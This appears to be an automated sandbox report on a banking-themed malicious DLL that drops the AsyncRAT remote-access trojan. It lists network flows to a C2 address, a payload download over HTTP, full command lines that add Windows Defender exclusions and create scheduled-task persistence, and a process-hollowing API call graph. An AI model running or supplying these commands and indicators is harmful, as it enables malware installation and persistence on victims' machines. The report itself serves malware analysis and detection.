Dec 10, 2024 14:25:34.084350109 CET  4449         49756      185.208.158.187  192.168.2.7
Dec 10, 2024 14:25:34.090190887 CET  49756        4449       192.168.2.7      185.208.158.187
Dec 10, 2024 14:25:34.210851908 CET  4449         49756      185.208.158.187  192.168.2.7
Dec 10, 2024 14:25:34.211041927 CET  49756        4449       192.168.2.7      185.208.158.187
Dec 10, 2024 14:25:34.330581903 CET  4449         49756      185.208.158.187  192.168.2.7
Dec 10, 2024 14:25:36.044274092 CET  49756        4449       192.168.2.7      185.208.158.187
Dec 10, 2024 14:25:36.163563967 CET  4449         49756      185.208.158.187  192.168.2.7
Dec 10, 2024 14:25:36.164669037 CET  49756        4449       192.168.2.7      185.208.158.187
Dec 10, 2024 14:25:36.283977985 CET  4449         49756      185.208.158.187  192.168.2.7
Dec 10, 2024 14:25:36.593120098 CET  4449         49756      185.208.158.187  192.168.2.7
Dec 10, 2024 14:25:36.635935068 CET  49756        4449       192.168.2.7      185.208.158.187
Dec 10, 2024 14:25:36.785486937 CET  4449         49756      185.208.158.187  192.168.2.7
                                Dec 10, 2024 14:25:36.787273884 CET497564449192.168.2.7185.208.158.187
                                Dec 10, 2024 14:25:36.906578064 CET444949756185.208.158.187192.168.2.7
                                Dec 10, 2024 14:25:36.908317089 CET497564449192.168.2.7185.208.158.187
                                Dec 10, 2024 14:25:37.027570963 CET444949756185.208.158.187192.168.2.7
                                Dec 10, 2024 14:25:41.402053118 CET497564449192.168.2.7185.208.158.187
                                Dec 10, 2024 14:25:41.521320105 CET444949756185.208.158.187192.168.2.7
                                Dec 10, 2024 14:25:41.521384001 CET497564449192.168.2.7185.208.158.187
                                Dec 10, 2024 14:25:41.640790939 CET444949756185.208.158.187192.168.2.7
                                Dec 10, 2024 14:25:41.960050106 CET444949756185.208.158.187192.168.2.7
                                Dec 10, 2024 14:25:42.011023045 CET497564449192.168.2.7185.208.158.187
                                Dec 10, 2024 14:25:42.151993990 CET444949756185.208.158.187192.168.2.7
                                Dec 10, 2024 14:25:42.200192928 CET497564449192.168.2.7185.208.158.187
                                Dec 10, 2024 14:25:44.071743011 CET497564449192.168.2.7185.208.158.187
                                Dec 10, 2024 14:25:44.190995932 CET444949756185.208.158.187192.168.2.7
                                Dec 10, 2024 14:25:44.191051960 CET497564449192.168.2.7185.208.158.187
                                Dec 10, 2024 14:25:44.310271025 CET444949756185.208.158.187192.168.2.7
                                Dec 10, 2024 14:25:44.622484922 CET444949756185.208.158.187192.168.2.7
                                Dec 10, 2024 14:25:44.667236090 CET497564449192.168.2.7185.208.158.187
                                Dec 10, 2024 14:25:44.814337969 CET444949756185.208.158.187192.168.2.7
                                Dec 10, 2024 14:25:44.815011978 CET497564449192.168.2.7185.208.158.187
                                Dec 10, 2024 14:25:44.934310913 CET444949756185.208.158.187192.168.2.7
                                Dec 10, 2024 14:25:44.934447050 CET497564449192.168.2.7185.208.158.187
                                Dec 10, 2024 14:25:45.053819895 CET444949756185.208.158.187192.168.2.7
                                Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                Dec 10, 2024 14:21:36.101058960 CET | 51088 | 53 | 192.168.2.7 | 1.1.1.1
                                Dec 10, 2024 14:21:37.154922009 CET | 51088 | 53 | 192.168.2.7 | 1.1.1.1
                                Dec 10, 2024 14:21:37.964509010 CET | 53 | 51088 | 1.1.1.1 | 192.168.2.7
                                Dec 10, 2024 14:21:37.964521885 CET | 53 | 51088 | 1.1.1.1 | 192.168.2.7
                                Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                Dec 10, 2024 14:21:36.101058960 CET | 192.168.2.7 | 1.1.1.1 | 0x8682 | Standard query (0) | 52575815-38-20200406120634.webstarterz.com | A (IP address) | IN (0x0001) | false
                                Dec 10, 2024 14:21:37.154922009 CET | 192.168.2.7 | 1.1.1.1 | 0x8682 | Standard query (0) | 52575815-38-20200406120634.webstarterz.com | A (IP address) | IN (0x0001) | false
                                Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                Dec 10, 2024 14:21:37.964509010 CET | 1.1.1.1 | 192.168.2.7 | 0x8682 | No error (0) | 52575815-38-20200406120634.webstarterz.com | | 163.44.198.57 | A (IP address) | IN (0x0001) | false
                                Dec 10, 2024 14:21:37.964521885 CET | 1.1.1.1 | 192.168.2.7 | 0x8682 | No error (0) | 52575815-38-20200406120634.webstarterz.com | | 163.44.198.57 | A (IP address) | IN (0x0001) | false
                                Dec 10, 2024 14:21:55.895550013 CET | 1.1.1.1 | 192.168.2.7 | 0xadd8 | No error (0) | edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com | default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com | | CNAME (Canonical name) | IN (0x0001) | false
                                Dec 10, 2024 14:21:55.895550013 CET | 1.1.1.1 | 192.168.2.7 | 0xadd8 | No error (0) | default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com | | 217.20.58.98 | A (IP address) | IN (0x0001) | false
                                Dec 10, 2024 14:21:55.895550013 CET | 1.1.1.1 | 192.168.2.7 | 0xadd8 | No error (0) | default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com | | 217.20.58.99 | A (IP address) | IN (0x0001) | false
                                Dec 10, 2024 14:21:55.895550013 CET | 1.1.1.1 | 192.168.2.7 | 0xadd8 | No error (0) | default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com | | 217.20.58.100 | A (IP address) | IN (0x0001) | false
                                Dec 10, 2024 14:21:55.895550013 CET | 1.1.1.1 | 192.168.2.7 | 0xadd8 | No error (0) | default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com | | 217.20.58.101 | A (IP address) | IN (0x0001) | false
                                Dec 10, 2024 14:22:39.580984116 CET | 1.1.1.1 | 192.168.2.7 | 0x4b50 | No error (0) | bg.microsoft.map.fastly.net | | 199.232.214.172 | A (IP address) | IN (0x0001) | false
                                Dec 10, 2024 14:22:39.580984116 CET | 1.1.1.1 | 192.168.2.7 | 0x4b50 | No error (0) | bg.microsoft.map.fastly.net | | 199.232.210.172 | A (IP address) | IN (0x0001) | false
                                • 52575815-38-20200406120634.webstarterz.com
                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                0 | 192.168.2.7 | 49700 | 163.44.198.57 | 443 | 5776 | C:\Windows\System32\rundll32.exe
                                Timestamp | Bytes transferred | Direction | Data
                                2024-12-10 13:21:40 UTC | 111 | OUT | GET /EpWHRWboolCJUXe.exe HTTP/1.1
                                Connection: Keep-Alive
                                Host: 52575815-38-20200406120634.webstarterz.com
                                2024-12-10 13:21:40 UTC | 252 | IN | HTTP/1.1 200 OK
                                Date: Tue, 10 Dec 2024 13:21:40 GMT
                                Server: Apache
                                Last-Modified: Tue, 10 Dec 2024 05:41:54 GMT
                                ETag: "a3a08-628e3f052d239"
                                Accept-Ranges: bytes
                                Content-Length: 670216
                                Connection: close
                                Content-Type: application/x-msdownload


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                1 | 192.168.2.7 | 49701 | 163.44.198.57 | 443 | 1476 | C:\Windows\System32\rundll32.exe
                                Timestamp | Bytes transferred | Direction | Data
                                2024-12-10 13:21:42 UTC | 111 | OUT | GET /EpWHRWboolCJUXe.exe HTTP/1.1
                                Connection: Keep-Alive
                                Host: 52575815-38-20200406120634.webstarterz.com
                                2024-12-10 13:21:43 UTC | 252 | IN | HTTP/1.1 200 OK
                                Date: Tue, 10 Dec 2024 13:21:42 GMT
                                Server: Apache
                                Last-Modified: Tue, 10 Dec 2024 05:41:54 GMT
                                ETag: "a3a08-628e3f052d239"
                                Accept-Ranges: bytes
                                Content-Length: 670216
                                Connection: close
                                Content-Type: application/x-msdownload


                                Target ID:1
                                Start time:08:21:35
                                Start date:10/12/2024
                                Path:C:\Windows\System32\loaddll64.exe
                                Wow64 process (32bit):false
                                Commandline:loaddll64.exe "C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.dqy.dll"
                                Imagebase:0x7ff6cab30000
                                File size:165'888 bytes
                                MD5 hash:763455F9DCB24DFEECC2B9D9F8D46D52
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                Target ID:2
                                Start time:08:21:35
                                Start date:10/12/2024
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff75da10000
                                File size:862'208 bytes
                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                Target ID:3
                                Start time:08:21:35
                                Start date:10/12/2024
                                Path:C:\Windows\System32\cmd.exe
                                Wow64 process (32bit):false
                                Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.dqy.dll",#1
                                Imagebase:0x7ff779b70000
                                File size:289'792 bytes
                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                Target ID:4
                                Start time:08:21:35
                                Start date:10/12/2024
                                Path:C:\Windows\System32\rundll32.exe
                                Wow64 process (32bit):false
                                Commandline:rundll32.exe C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.dqy.dll,xlAutoOpen
                                Imagebase:0x7ff7c8270000
                                File size:71'680 bytes
                                MD5 hash:EF3179D498793BF4234F708D3BE28633
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                Target ID:5
                                Start time:08:21:35
                                Start date:10/12/2024
                                Path:C:\Windows\System32\rundll32.exe
                                Wow64 process (32bit):false
                                Commandline:rundll32.exe "C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.dqy.dll",#1
                                Imagebase:0x7ff7c8270000
                                File size:71'680 bytes
                                MD5 hash:EF3179D498793BF4234F708D3BE28633
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                Target ID:11
                                Start time:08:21:38
                                Start date:10/12/2024
                                Path:C:\Windows\System32\rundll32.exe
                                Wow64 process (32bit):false
                                Commandline:rundll32.exe "C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.dqy.dll",xlAutoOpen
                                Imagebase:0x7ff7c8270000
                                File size:71'680 bytes
                                MD5 hash:EF3179D498793BF4234F708D3BE28633
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                Target ID:13
                                Start time:08:21:44
                                Start date:10/12/2024
                                Path:C:\Users\user\AppData\Roaming\regasms.exe
                                Wow64 process (32bit):true
                                Commandline:C:\Users\user\AppData\Roaming\regasms.exe
                                Imagebase:0x350000
                                File size:670'216 bytes
                                MD5 hash:AE806B6F5E02484C2BE2B49DA35B3D26
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 0000000D.00000002.1403401343.0000000002827000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                Antivirus matches:
                                • Detection: 100%, Joe Sandbox ML
                                • Detection: 26%, ReversingLabs
                                Reputation:low
                                Has exited:true

                                Target ID:15
                                Start time:08:21:47
                                Start date:10/12/2024
                                Path:C:\Users\user\AppData\Roaming\regasms.exe
                                Wow64 process (32bit):true
                                Commandline:C:\Users\user\AppData\Roaming\regasms.exe
                                Imagebase:0xd60000
                                File size:670'216 bytes
                                MD5 hash:AE806B6F5E02484C2BE2B49DA35B3D26
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 0000000F.00000002.1440771055.0000000003217000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                Reputation:low
                                Has exited:true

                                Target ID:16
                                Start time:08:21:47
                                Start date:10/12/2024
                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe"
                                Imagebase:0x3a0000
                                File size:433'152 bytes
                                MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                Target ID:17
                                Start time:08:21:47
                                Start date:10/12/2024
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff75da10000
                                File size:862'208 bytes
                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                Target ID:18
                                Start time:08:21:47
                                Start date:10/12/2024
                                Path:C:\Windows\SysWOW64\schtasks.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AtkzppDHiyvcIR" /XML "C:\Users\user\AppData\Local\Temp\tmp18B1.tmp"
                                Imagebase:0x970000
                                File size:187'904 bytes
                                MD5 hash:48C2FE20575769DE916F48EF0676A965
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                Target ID:19
                                Start time:08:21:47
                                Start date:10/12/2024
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff75da10000
                                File size:862'208 bytes
                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                Target ID:20
                                Start time:08:21:48
                                Start date:10/12/2024
                                Path:C:\Users\user\AppData\Roaming\regasms.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Users\user\AppData\Roaming\regasms.exe"
                                Imagebase:0x670000
                                File size:670'216 bytes
                                MD5 hash:AE806B6F5E02484C2BE2B49DA35B3D26
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000014.00000002.1519769182.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                Has exited:true

                                Target ID:21
                                Start time:08:21:50
                                Start date:10/12/2024
                                Path:C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe
                                Wow64 process (32bit):true
                                Commandline:C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe
                                Imagebase:0x3d0000
                                File size:670'216 bytes
                                MD5 hash:AE806B6F5E02484C2BE2B49DA35B3D26
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000015.00000002.1540173205.0000000002935000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                Antivirus matches:
                                • Detection: 100%, Joe Sandbox ML
                                • Detection: 26%, ReversingLabs
                                Has exited:true

                                Target ID:22
                                Start time:08:21:51
                                Start date:10/12/2024
                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe"
                                Imagebase:0x3a0000
                                File size:433'152 bytes
                                MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Has exited:true

                                Target ID:23
                                Start time:08:21:51
                                Start date:10/12/2024
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff75da10000
                                File size:862'208 bytes
                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Has exited:true

                                Target ID:25
                                Start time:08:21:51
                                Start date:10/12/2024
                                Path:C:\Windows\SysWOW64\schtasks.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AtkzppDHiyvcIR" /XML "C:\Users\user\AppData\Local\Temp\tmp2042.tmp"
                                Imagebase:0x970000
                                File size:187'904 bytes
                                MD5 hash:48C2FE20575769DE916F48EF0676A965
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Has exited:true

                                Target ID:26
                                Start time:08:21:51
                                Start date:10/12/2024
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff75da10000
                                File size:862'208 bytes
                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Has exited:true

                                Target ID:27
                                Start time:08:21:51
                                Start date:10/12/2024
                                Path:C:\Users\user\AppData\Roaming\regasms.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Users\user\AppData\Roaming\regasms.exe"
                                Imagebase:0xdc0000
                                File size:670'216 bytes
                                MD5 hash:AE806B6F5E02484C2BE2B49DA35B3D26
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Has exited:false

                                Target ID:28
                                Start time:08:21:51
                                Start date:10/12/2024
                                Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                Imagebase:0x7ff7fb730000
                                File size:496'640 bytes
                                MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                Has elevated privileges:true
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Has exited:true

                                Target ID:29
                                Start time:09:29:12
                                Start date:10/12/2024
                                Path:C:\Windows\SysWOW64\schtasks.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AtkzppDHiyvcIR" /XML "C:\Users\user\AppData\Local\Temp\tmp9EF.tmp"
                                Imagebase:0x970000
                                File size:187'904 bytes
                                MD5 hash:48C2FE20575769DE916F48EF0676A965
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Has exited:true

                                Target ID:30
                                Start time:09:29:12
                                Start date:10/12/2024
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff75da10000
                                File size:862'208 bytes
                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Has exited:true

                                Target ID:31
                                Start time:09:29:12
                                Start date:10/12/2024
                                Path:C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe
                                Wow64 process (32bit):false
                                Commandline:"C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe"
                                Imagebase:0x70000
                                File size:670'216 bytes
                                MD5 hash:AE806B6F5E02484C2BE2B49DA35B3D26
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Has exited:true

                                Target ID:32
                                Start time:09:29:12
                                Start date:10/12/2024
                                Path:C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe"
                                Imagebase:0x7d0000
                                File size:670'216 bytes
                                MD5 hash:AE806B6F5E02484C2BE2B49DA35B3D26
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Has exited:true

                                Target ID:33
                                Start time:09:29:13
                                Start date:10/12/2024
                                Path:C:\Windows\SysWOW64\cmd.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "NotepadUpdate" /tr '"C:\Users\user\AppData\Roaming\NotepadUpdate.exe"' & exit
                                Imagebase:0x410000
                                File size:236'544 bytes
                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Has exited:true

                                Target ID:34
                                Start time:09:29:13
                                Start date:10/12/2024
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff75da10000
                                File size:862'208 bytes
                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Has exited:true

                                Target ID:35
                                Start time:09:29:13
                                Start date:10/12/2024
                                Path:C:\Windows\SysWOW64\cmd.exe
                                Wow64 process (32bit):true
                                Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpD9E2.tmp.bat""
                                Imagebase:0x410000
                                File size:236'544 bytes
                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Has exited:true

                                Target ID:36
                                Start time:09:29:13
                                Start date:10/12/2024
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff75da10000
                                File size:862'208 bytes
                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Has exited:true

                                Target ID:37
                                Start time:09:29:13
                                Start date:10/12/2024
                                Path:C:\Windows\SysWOW64\schtasks.exe
                                Wow64 process (32bit):true
                                Commandline:schtasks /create /f /sc onlogon /rl highest /tn "NotepadUpdate" /tr '"C:\Users\user\AppData\Roaming\NotepadUpdate.exe"'
                                Imagebase:0x970000
                                File size:187'904 bytes
                                MD5 hash:48C2FE20575769DE916F48EF0676A965
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Has exited:true

                                Target ID:38
                                Start time:09:29:13
                                Start date:10/12/2024
                                Path:C:\Windows\SysWOW64\timeout.exe
                                Wow64 process (32bit):true
                                Commandline:timeout 3
                                Imagebase:0xac0000
                                File size:25'088 bytes
                                MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Has exited:true

                                Target ID:39
                                Start time:09:29:16
                                Start date:10/12/2024
                                Path:C:\Users\user\AppData\Roaming\NotepadUpdate.exe
                                Wow64 process (32bit):true
                                Commandline:C:\Users\user\AppData\Roaming\NotepadUpdate.exe
                                Imagebase:0xea0000
                                File size:670'216 bytes
                                MD5 hash:AE806B6F5E02484C2BE2B49DA35B3D26
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Antivirus matches:
                                • Detection: 100%, Joe Sandbox ML
                                • Detection: 26%, ReversingLabs
                                Has exited:true

                                Target ID:40
                                Start time:09:29:16
                                Start date:10/12/2024
                                Path:C:\Users\user\AppData\Roaming\NotepadUpdate.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Users\user\AppData\Roaming\NotepadUpdate.exe"
                                Imagebase:0xdb0000
                                File size:670'216 bytes
                                MD5 hash:AE806B6F5E02484C2BE2B49DA35B3D26
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Has exited:true

                                Target ID:41
                                Start time:09:29:17
                                Start date:10/12/2024
                                Path:C:\Windows\SysWOW64\cmd.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "NotepadUpdate" /tr '"C:\Users\user\AppData\Roaming\NotepadUpdate.exe"' & exit
                                Imagebase:0x410000
                                File size:236'544 bytes
                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Has exited:true

                                Target ID:42
                                Start time:09:29:17
                                Start date:10/12/2024
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff75da10000
                                File size:862'208 bytes
                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Has exited:true

                                Target ID:43
                                Start time:09:29:17
                                Start date:10/12/2024
                                Path:C:\Windows\SysWOW64\schtasks.exe
                                Wow64 process (32bit):true
                                Commandline:schtasks /create /f /sc onlogon /rl highest /tn "NotepadUpdate" /tr '"C:\Users\user\AppData\Roaming\NotepadUpdate.exe"'
                                Imagebase:0x970000
                                File size:187'904 bytes
                                MD5 hash:48C2FE20575769DE916F48EF0676A965
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Has exited:true

                                  Execution Graph

                                  Execution Coverage:11.8%
                                  Dynamic/Decrypted Code Coverage:98.9%
                                  Signature Coverage:1.8%
                                  Total number of Nodes:284
                                  Total number of Limit Nodes:16
7228feb 54432->54433 54433->54432 54434 7229819 54433->54434 54435 7225811 ResumeThread 54433->54435 54436 7225818 ResumeThread 54433->54436 54435->54433 54436->54433 54439 7228e0c 54437->54439 54438 7228e29 54438->54330 54439->54438 54440 7225ce8 CreateProcessA 54439->54440 54441 7225cdc CreateProcessA 54439->54441 54440->54438 54441->54438 54443 7229072 54442->54443 54522 72259a0 54443->54522 54526 7225998 54443->54526 54444 7229090 54448 722959b 54447->54448 54450 7225a60 WriteProcessMemory 54448->54450 54451 7225a59 WriteProcessMemory 54448->54451 54449 72295d3 54450->54449 54451->54449 54454 7229039 54452->54454 54453 72294b9 54453->54330 54454->54453 54456 7225b50 ReadProcessMemory 54454->54456 54457 7225b48 ReadProcessMemory 54454->54457 54455 722905f 54455->54330 54456->54455 54457->54455 54460 7228f5d 54458->54460 54459 72295d3 54461 7225a60 WriteProcessMemory 54460->54461 54462 7225a59 WriteProcessMemory 54460->54462 54461->54459 54462->54459 54464 72290ab 54463->54464 54465 722905f 54463->54465 54466 7225b50 ReadProcessMemory 54464->54466 54467 7225b48 ReadProcessMemory 54464->54467 54465->54330 54466->54465 54467->54465 54470 72258c0 Wow64SetThreadContext 54468->54470 54471 72258c8 Wow64SetThreadContext 54468->54471 54469 7229326 54469->54330 54470->54469 54471->54469 54474 7228feb 54472->54474 54473 7229819 54474->54473 54475 7225811 ResumeThread 54474->54475 54476 7225818 ResumeThread 54474->54476 54475->54474 54476->54474 54479 7228e0d 54477->54479 54478 7228e29 54478->54330 54479->54478 54480 7225ce8 CreateProcessA 54479->54480 54481 7225cdc CreateProcessA 54479->54481 54480->54478 54481->54478 54483 7225818 ResumeThread 54482->54483 54485 7225889 54483->54485 54485->54406 54487 7225858 ResumeThread 54486->54487 54489 7225889 54487->54489 54489->54406 54491 72258c5 Wow64SetThreadContext 54490->54491 54493 7225955 54491->54493 54493->54411 54495 722590d Wow64SetThreadContext 54494->54495 54497 7225955 54495->54497 54497->54411 54499 7225aa8 
WriteProcessMemory 54498->54499 54501 7225aff 54499->54501 54501->54415 54503 7225a60 WriteProcessMemory 54502->54503 54505 7225aff 54503->54505 54505->54415 54507 7225d71 CreateProcessA 54506->54507 54509 7225f33 54507->54509 54509->54509 54511 7225ce8 CreateProcessA 54510->54511 54513 7225f33 54511->54513 54513->54513 54515 7225b9b ReadProcessMemory 54514->54515 54517 7225bdf 54515->54517 54517->54429 54519 7225b51 ReadProcessMemory 54518->54519 54521 7225bdf 54519->54521 54521->54429 54523 72259e0 VirtualAllocEx 54522->54523 54525 7225a1d 54523->54525 54525->54444 54527 72259a0 VirtualAllocEx 54526->54527 54529 7225a1d 54527->54529 54529->54444
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.1437095337.0000000008870000.00000040.00000800.00020000.00000000.sdmp, Offset: 08870000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_8870000_regasms.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: (oq$4'q$4'q$4'q$4'q
                                  • API String ID: 0-921078497
                                  • Opcode ID: 593e7375a5f26e76d35099c04dab7d096595efe260d7136e1b31c4d574618f2d
                                  • Instruction ID: 1c73e6c4a791843f3dbf8c04e0af03921c808e8f95b2a4308c45d705441bca28
                                  • Opcode Fuzzy Hash: 593e7375a5f26e76d35099c04dab7d096595efe260d7136e1b31c4d574618f2d
